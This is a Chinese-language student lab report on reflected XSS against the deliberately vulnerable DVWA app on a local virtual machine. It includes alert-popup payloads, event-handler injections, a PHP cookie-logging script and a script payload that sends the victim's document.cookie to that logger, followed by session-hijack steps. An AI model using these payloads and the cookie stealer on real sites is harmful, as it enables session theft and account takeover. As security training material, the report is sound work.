反射型XSS漏洞

大家好，又见面了，我是你们的朋友全栈君。

一、实验综述

1.实验目的及要求

（1）跨站脚本（XSS）
XSS是一种在web应用中的计算机安全漏洞，它允许恶意web用户将代码植入到提供给其它用户使用的页面中。
（2）XSS漏洞分成三类：
一类是反射型XSS漏洞。产生原因：没有对用户提交的内容进行可靠的输入验证。
一类是保存型XSS漏洞。产生原因：未经适当 过滤净化就将保存在后端数据库的 用户提交的数据显示给其他用户。
另一类则是来自基于DOM的XSS漏洞。由于客户端JavaScript可以访问浏览器的文本对象模型（DOM），因此，它能够决定用于加载当前页面的URL，由应用程序发布的一段脚本可以从URL中提取数据，对这些数据进行处理，然后用它更新页面的内容，如果这样，应用程序就易受到基于 DOM的XSS攻击。

2.实验仪器、设备或软件

Vmware Workstation Pro 15.0
PHP study、DVWA
Windows 7操作系统

3.实验原理

（1）XSS工作原理：
XSS:Cross Site Script,为了和层叠式表(Cascading style sheet,CSS)有所区别，在安全领域叫做“XSS”.
XSS攻击，通常指黑客通过“HTML注入”篡改了网页，插入了恶意脚本从而在用户浏览网页时，控制用户浏览器的一种攻击。在一开始，这种攻击的演示安全是跨域的，所以叫做“跨站脚本”。但是发展到今天，由于JavaScript的强大功能以及网站前端应用的复杂化，是否跨域已经不再重要，由于历史原因，XSS一直保留下来。
（2）Web原理：两种 HTTP 请求方法：GET 和 POST
在客户机和服务器之间进行请求-响应时，两种最常被用到的方法是：GET 和 POST。GET – 从指定的资源请求数据。POST – 向指定的资源提交要被处理的数据。

二、实验过程（步骤过程、数据记录）

1.步骤

（1）打开虚拟机，在命令行中输入命令（ipconfig）查看虚拟机的IP地址。

（2）打开软件phpstudy_pro，启动Apache2.4.39和MySQL5.7.26.

（3）在本地浏览器中输入：http://192.168.45.128/DVWA-master/setup.php进入DVWA页面。

（4）将DVWA Security设为Low

（5）点击左侧XSS(reflected)

（6）在DVWA地址框中输入：http://192.168.45.128/DVWA-master/vulnerabilities/xss_r/?name=#

显示结果，跳转到如下页面：

出现弹窗，说明存在xss。
从虚拟机外的主机访问192.168.45.128

（7）从虚拟机外的主机访问192.168.45.128
地址栏输入：http://192.168.45.168/DVWA-master/vulnerabilities/xss_r/?name=zhangsan

返回页面显示如下：

点击右下方的“View Source”显示页面如下：

根据回显信息判断出，显示的文本内容是 Hello name 。 我 们 输 入 的 信 息 被 存 放 在 name。我们输入的信息被存放在name 变量中。

（8）添加一条 JavaScript 代码获取 cookie，在上述文本框中输入，点击“submit”，弹出如下对话框：


可以看到我们提交的文本信息被浏览器执行了，显示出了我们的 cookie 信息。说明此网站有 XSS 漏洞！

（9）在文本框中输入<body οnlοad=alert(‘xss2’)>

（10）文本框输入：<a href=’’ οnclick=alert(‘xss3’)>click1

显示结果如下：

点击“click1”，显示结果如下：

（11）在虚拟机192.168.45.128的WWW/DVWA-master目录下，新建cookie1.php，具体内容如下：

<?php
$cookie = $_GET['cookie']; //以GET方式获取cookie变量值
$fp = fopen('cookie.txt', 'a'); //打开cookie.txt，若不存在则创建它
fwrite($fp,"my cookie is:".$cookie."\n"); //写入文件
fclose($fp); //关闭文件
?>

在客户端的文本框中输入以下内容，点击submit

<script>document.location='http://192.168.45.128/DVWA-master/cookie1.php?cookie='+document.cookie;</script>

在DVWA-master文件夹中生成cookie.text, 打开cookie.txt，可看到客户端的cookie值保存在该文本文件中

2.数据记录

（1）输入：
http://162.168.45.128/DVWA-master/vulnerabilities/xss_r/?name=<script>alert("1")</script>#
输出：
1	
（2）输入：
http://192.168.45.128 /DVWA-master/vulnerabilities/xss_r/?name=zhangsan</script>
输出：
Hello zhangsan
（3）输入：
<script> alert(document.cookie) </script>
输出：
security=low;PHPSESSID=6feglj7cp01c7mk04dndleb6r2
（4）输入：
<body onload=alert('xss2')>
输出：
xss2
（5）输入：
<a href='' onclick=alert('xss3')>click1</a>
输出：
Hello click1
（5）输入：
<script>document.location='http://192.168.45.128/DVWA-master/cookie1.php?cookie='+document.cookie;</script>
输出：
创建cookie.txt文件

三、结果讨论与分析

1.实验结果

最终获取到用户的cookie信息：
my cookie is :security=low:PHPSESSID=6avva45en6mubmd3augjkcpjga

2.分析讨论

本次实验在DVWA虚拟环境中进行，学习到了xss注入的基本原理以及基本步骤，如何利用xss漏洞进行攻击，如何获取用户的cookie信息。

3.总结

反射型XSS漏洞产生原因及步骤：
原因：没有对用户输入的内容进行有效验证
步骤：
（1）用户正常登录，得到包含会话令牌的cookie
（2）攻击者将准备好的URL提交给用户
（3）用户访问攻击者 提供的URL
（4）服务器对攻击者的JavaScript做出响应
（5）攻击者的JavaScript在用户浏览器中执行
（6）用户浏览器向攻击者发送会话令牌
（7）攻击者劫持用户会话，得到cookie，访问用户个人信息并以该用户权限执行任意操作。